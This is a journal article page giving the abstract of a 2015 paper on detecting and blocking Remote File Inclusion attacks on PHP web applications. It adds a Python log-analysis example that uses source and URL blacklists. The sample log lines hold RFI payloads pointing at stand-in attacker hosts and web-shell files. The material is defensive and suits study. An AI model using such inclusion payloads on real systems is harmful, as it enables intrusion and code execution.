Defending Against Remote File Inclusion Attacks on Web Applications

Bharti Nagpal*, Naresh Chauhan**, Nanhay Singh***
* Assistant Professor, Ambedkar Institute Of Advanced Communication Technology & Research, Delhi, India.
** Professor, YMCA University of Science & Technology, Haryana, India.
*** Assistant Professor, Ambedkar Institute Of Advanced Communication Technology & Research, Delhi, India.
Periodicity: June - August 2015
DOI : https://doi.org/10.26634/jit.4.3.3488

Abstract

Web applications are the fundamental pillars of today's world; society depends on them for business and day-to-day tasks. Because of their extensive use, web applications are under constant attack by hackers who exploit their vulnerabilities to disrupt business and gain access to confidential information. Remote File Inclusion (RFI) is a type of vulnerability frequently found on websites. It allows an attacker to include a remote file, usually through a script on the web server. The attackers operate independently of one another, each seeking exploitable vulnerabilities on the web. Several causes of the attack were identified, such as the use of user-supplied input without proper validation. The consequences range from something as minor as outputting the contents of a file to far more serious events. From our observations, it is apparent that such attacks can be detected and blocked by creating a blacklist of attack sources and a blacklist of URLs of remotely included malicious scripts. Remote file inclusion is a technique used to attack web applications, mainly PHP applications, from a remote server. RFI attacks are extremely dangerous because they allow a client to force a vulnerable application to run the attacker's own malicious code by including a reference pointer to code at a URL located on a remote server. When an application executes the malicious code, it may lead to a backdoor exploit or to the retrieval of technical information. Attackers attempt to remotely include these scripts within web applications. While the scripts are hosted at many locations, many of them are duplicates of each other, so the number of distinct scripts actually used in the attacks is very small.
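As an added illustration (not code from the paper or its authors), the blacklist-based detection the abstract describes, run over constructed web-server access-log lines: requests whose parameter values name a remote URL are flagged as inclusion attempts, each is checked against a blacklist of attack sources and a blacklist of remotely included script URLs, and the URLs are normalized so duplicate copies of one script collapse to a single entry. The log lines, addresses, URLs and blacklists are constructed sample data.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed access-log lines in combined log format (sample data, not from the paper).
SAMPLE_LOG = """\
203.0.113.5 - - [12/Jun/2015:10:01:02 +0000] "GET /index.php?page=about HTTP/1.1" 200 512
203.0.113.9 - - [12/Jun/2015:10:01:07 +0000] "GET /index.php?page=http://evil.example/shell.txt? HTTP/1.1" 200 88
198.51.100.7 - - [12/Jun/2015:10:02:11 +0000] "GET /view.php?file=HTTP://EVIL.EXAMPLE/shell.txt%3F HTTP/1.1" 200 88
198.51.100.7 - - [12/Jun/2015:10:02:15 +0000] "GET /view.php?file=ftp://mirror.example/r57.txt HTTP/1.1" 200 90
"""

LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) HTTP/[\d.]+"')
REMOTE_SCHEMES = {"http", "https", "ftp", "ftps"}

def remote_targets(path):
    """Return request-parameter values that name a remote resource (an RFI attempt)."""
    found = []
    for values in parse_qs(urlsplit(path).query).values():
        for value in values:
            value = unquote(value).strip()          # second decode normalizes double-encoded values
            if urlsplit(value).scheme.lower() in REMOTE_SCHEMES:
                found.append(value)
    return found

def normalize(url):
    """Canonical URL so duplicate copies of one script compare equal across attackers."""
    parts = urlsplit(url.rstrip("?"))               # drop a trailing '?' appended to the URL
    return f"{parts.scheme.lower()}://{parts.netloc.lower()}{parts.path}"

def analyze(log_text, ip_blacklist, url_blacklist):
    """Flag RFI attempts and record which blacklist (source or script URL) would block each."""
    hits = []
    for line in log_text.splitlines():
        match = LOG_RE.match(line)
        if not match:
            continue
        src, path = match.groups()
        for target in remote_targets(path):
            url = normalize(target)
            hits.append({"src": src, "url": url, "blocked_by_src": src in ip_blacklist,
                         "blocked_by_url": url in url_blacklist})
    return hits

def distinct_scripts(hits):  # the few actual scripts behind many inclusion attempts
    return sorted({h["url"] for h in hits})

if __name__ == "__main__":   # constructed source and script-URL blacklists
    for hit in analyze(SAMPLE_LOG, {"203.0.113.9"}, {"http://evil.example/shell.txt"}):
        print(hit)
```

Three attempts are flagged but only two distinct scripts remain after normalization, which is the duplication the abstract points out; the second attempt escapes the source blacklist and is caught only by the URL blacklist.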

Keywords

Security, Exploit, Vulnerability, RFI Attack, File Inclusion

How to Cite this Article?

Nagpal, B., Chauhan, N., and Singh, N. (2015). Defending Against Remote File Inclusion Attacks on Web Applications. i-manager’s Journal on Information Technology, 4(3), 25-33. https://doi.org/10.26634/jit.4.3.3488
